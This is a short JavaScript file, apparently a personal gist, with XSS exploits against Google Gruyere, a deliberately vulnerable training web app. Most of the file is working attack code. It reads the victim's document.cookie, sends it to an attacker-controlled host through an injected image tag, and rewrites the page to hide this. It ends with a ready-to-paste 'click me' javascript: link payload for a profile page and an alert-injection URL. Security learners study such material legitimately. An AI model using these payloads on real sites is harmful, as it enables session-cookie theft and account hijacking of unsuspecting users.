An XSS script, does a few things

exploit-google-gruyere.js

/*
 * AUTHOR: Keith Stellyes
 *
 * This is for Google's http://google-gruyere.appspot.com/
 * This contains various exploits for it.
 *
 * At the very bottom, the exact HTML to insert into the profile is there.
 * This specific attack assumes the attacker has a web page ready to listen. This would be put
 * on the user page and sends the cookie data to the attacker's own server.
 * 
 * FIRST: save original HTML source of page
 * SECOND: Generate copy of the page with our site listening
 * THIRD: Write that copy
 * FOURTH: Write original source
 *
 * Get the page to do an alert. We could encode our injection script for one, or others.
 * http://google-gruyere.appspot.com/725437288779/%3Cscript%3Ealert(1)%3C/script%3E
 */

var myevilsite = 'google.com/';
var evillink = encodeURI(myevilsite + document.cookie);
var og_src = document.documentElement.outerHTML;
var src = og_src;
src += '<img src=\'' + evillink + '\'></img>';

/* In a normal attack, this wouldn't be in, but left here for demonstration purposes */
alert(src);

document.open();
/* Write generated source */
document.write(src);
document.close();
document.open();
/* Write original source */
document.write(og_src);
document.close();


/* CODE TO INJECT (DELETE THE COMMENT MARKERS BEFORE AND AFTER SCRIPT: */

/*
<a href="javascript: function getleftpointybracket() {
 return '<img>'[0]
}
var myevilsite = 'google.com/'; 
var evillink = encodeURI(myevilsite + document.cookie);
var og_src = document.documentElement.outerHTML;
var src = og_src;
src += '<img src=\'' + evillink + '\'></img>';
alert(src);
document.open();
document.write(src);
document.close();
document.open();
document.write(og_src);
document.close();">click me</a>
*/